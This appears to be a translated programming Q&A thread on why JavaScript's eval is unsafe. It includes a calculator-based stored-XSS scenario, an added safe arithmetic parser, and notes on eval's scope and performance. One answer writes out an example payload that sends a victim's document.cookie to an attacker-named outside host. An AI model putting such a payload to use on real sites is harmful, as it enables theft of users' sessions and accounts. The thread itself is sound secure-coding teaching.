In the world of JavaScript developers, there is a well-established phrase:

"Eval is evil"

Why, and in what cases, is it unsafe to use eval in JavaScript? If the JavaScript is executed on the client side, how can an attacker hack the site?

The standard developer tools of many browsers allow code to be executed: anyone can run JavaScript code, for example in the Google Chrome browser, by entering it into the console.

That is, it seems to me (superficially) that the only thing an attacker can do is harm himself, because only he can see all of his changes. However, it is believed that with eval it is possible to steal the personal data of other users? What is the mechanism?

Why is eval classified as unsafe? If someone knows what specific threat this method can pose, please describe the situation and give sample code.

  • Here it has already been answered in detail: stackoverflow.com/questions/86513/… (thirty letters) - vladiik
  • Example (1). Get JSON data from a third-party site and parse it not with JSON.parse but with eval. The owner of the third-party site does not care about security, and the attacker uses that, with all the consequences (for you). - Ivan Black
  • @vladiik If possible, please post the entire answer here, supplementing it with the link. - Nicolas Chabanovsky

2 answers

Well, look. Suppose we wrote a calculator in which you can register and exchange formulas (that is, there is a server part where at least the users' credentials are stored). The attacker's goal is to gain access to the accounts of users, or of the administrator of this resource.

The calculator itself works like this: when you press a numeric key or a key with a mathematical operation symbol, we append it to the expr string; as a result we get:

 expr = '5 + 2 * 3'; 

When we click the "=" sign, eval is executed:

 var result = eval(expr); 

Hack stage: If an attacker sends a formula that, besides the mathematical content, contains JavaScript code, then for whoever it is sent to, the malicious script will be launched along with the formula. The formula received from the attacker may look like this:

 expr = '(document.createElement("img")).src="http://hacker885.ru/sniff?c=" + document.cookie, 5 + 2 * 3'; 

As a result: the attacker will be able to get cookies, access local/session storage, access the content of the page, and try to upload something (a virus, for example).

Plus: If we send this message to the administrator of the resource in this way, then thanks to the rights we receive, we can probably get to the backend of the resource.

In place of a calculator, there may be something more substantial: for example, an e-learning portal.

Something like this :)

P.S.

A little off topic, but I want to touch on it anyway.

Honestly, it is difficult to find a task where it would really be necessary to use eval; everything I came across was connected with something like a calculator or a visualizer of mathematical formulas.

I can say that writing a parser for mathematical expressions is not difficult. In my free time I sketched such a parser: http://jsfiddle.net/kadymov/6d79wmfg/4/ . It is not written very well, but it already works, and it takes 150 lines.

Use specific tools for specific tasks, and leave eval, if anywhere, only for the prototype stage.

  • Do you mean that eval is running on the server? If not, i.e. in the local browser, it seems that the "attacker" and the user of the calculator are one and the same person (otherwise describe where he came from). And why then does he need such frills to access cookies, etc.? - avp
  • No, eval is not running on the server. Both the attacker and the user are registered on the site as different users of the calculator. The attacker's goal is to gain access to the account. Of course, this is a made-up example, but there may be something weightier in place of a calculator: for example, an e-learning portal. - Aleksander K.
  • It can be added that using eval is evil in any programming language that has this or a similar tool, especially in the case of network applications. - skegg
  • @AleksanderK., then the example (whatever the calculator is) is so artificial that it simply does not work. An attacker can, without a locally executed eval, do in the browser (or another local program) everything he does in your example using eval. Therefore, this example has nothing to do with site protection. - avp
  • @skegg, I would not argue so categorically. Of course, uncontrolled eval in (hypothetically widespread) network applications provokes the development of distributed attacks (I don't know how successful they are, but they consume network resources, that's for sure). - avp
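
The fix the first answer's P.S. hints at (a parser instead of eval), as an added example that is not code from the original answer or from the linked jsfiddle: a recursive-descent evaluator for the calculator's expr string, which rejects anything that is not plain arithmetic. The function names tokenize, parse and safeCalc are assumptions for this example.

```javascript
// Added example, not the original answer's code: an arithmetic-only evaluator
// that replaces eval(expr) in the calculator above. It accepts numbers, + - * /,
// unary minus and parentheses; anything else (identifiers, strings, commas,
// property access) is rejected before anything could run.
function tokenize(src) {
  const re = /\s*(?:(\d+(?:\.\d+)?)|([-+*\/()]))/y; // sticky: a token must start at pos
  const tokens = []; let pos = 0;
  src = src.trim();
  while (pos < src.length) {
    re.lastIndex = pos;
    const m = re.exec(src);
    if (!m) throw new SyntaxError('unexpected input at ' + pos + ': ' + src.slice(pos, pos + 12));
    tokens.push(m[1] !== undefined ? { type: 'num', value: Number(m[1]) } : { type: 'op', value: m[2] });
    pos = re.lastIndex;
  }
  return tokens;
}
function parse(tokens) { // recursive descent; precedence is sum -> product -> primary
  let i = 0;
  const peek = () => (i < tokens.length ? tokens[i].value : null);
  function primary() {
    const t = tokens[i++];
    if (!t) throw new SyntaxError('unexpected end of expression');
    if (t.type === 'num') return t.value;
    if (t.value === '-') return -primary(); // unary minus
    if (t.value === '(') {
      const v = sum();
      const close = tokens[i++];
      if (!close || close.value !== ')') throw new SyntaxError('missing )');
      return v;
    }
    throw new SyntaxError('unexpected token ' + t.value);
  }
  function product() {
    let v = primary();
    while (peek() === '*' || peek() === '/') v = tokens[i++].value === '*' ? v * primary() : v / primary();
    return v;
  }
  function sum() {
    let v = product();
    while (peek() === '+' || peek() === '-') v = tokens[i++].value === '+' ? v + product() : v - product();
    return v;
  }
  const result = sum();
  if (i !== tokens.length) throw new SyntaxError('trailing token ' + tokens[i].value);
  return result;
}
function safeCalc(expr) { // drop-in for `var result = eval(expr)`; null means the input was rejected
  try { return parse(tokenize(expr)); } catch (e) { if (e instanceof SyntaxError) return null; throw e; }
}
```

The formula from the answer above is rejected at the first identifier, so nothing in it is ever evaluated; a genuine expression such as '5 + 2 * 3' still yields 11.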

  1. Eval does no harm on safe data.
  2. Not all data that seems to be verified actually is.
    For example, a server may send something written by another user that contains a malicious script. Or parameters may be taken from the address, or even from its hash fragment. Such a page is reached via a simple link, and the code of whoever made the link will be executed on a page of your domain.
  3. Eval reduces performance. Modern browsers are heavily tuned for optimization, almost to the level of compilation to native code.
    A single direct call to eval is enough to put an end to that.
    Any function containing a direct call to eval cannot be optimized by the browser, since the code runs in its context. It will have to retain access to all variables up the chain of closures, quite possibly thereby prolonging the life of what should have been collected by the garbage collector.
  4. An indirect eval call executes code in the global context.
    A common use case is to get the global object.
  5. In most cases, an eval call can be replaced with new Function.
  6. Why would you want to use eval?
    Very likely there is a better option for it.
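
Points 3 to 5 of the answer above, as an added example that is not part of the original answer: which scope a direct eval, an indirect eval and a new Function body can see. The names answerKey, scopeDemo and getGlobalObject are constructed for this example.

```javascript
// Added example, not from the original answer: the scope each form of
// dynamic code runs in (points 3 to 5 above). `answerKey` is a constructed name.
globalThis.answerKey = 'global'; // an explicit global property, visible from any scope

function scopeDemo() {
  const answerKey = 'inner'; // a local that shadows the global of the same name
  return {
    // Direct eval sees the caller's scope, which is why the engine cannot
    // optimise this function: every enclosing variable must stay reachable.
    direct: eval('answerKey'),
    // Indirect eval (any call that is not literally `eval(...)`) runs in the
    // global scope, so the local `answerKey` is invisible here.
    indirect: (0, eval)('answerKey'),
    // new Function also builds its body in the global scope; it still runs
    // arbitrary code, it just cannot reach the caller's locals.
    viaFunction: new Function('return answerKey')(),
  };
}

// Point 4's common use case: indirect eval of `this` yields the global object
// regardless of where it is called from (sloppy or strict caller).
function getGlobalObject() {
  return (0, eval)('this');
}
```

scopeDemo() returns { direct: 'inner', indirect: 'global', viaFunction: 'global' }, which is the whole difference between the three forms: only the direct call can read (and therefore pin) the caller's locals.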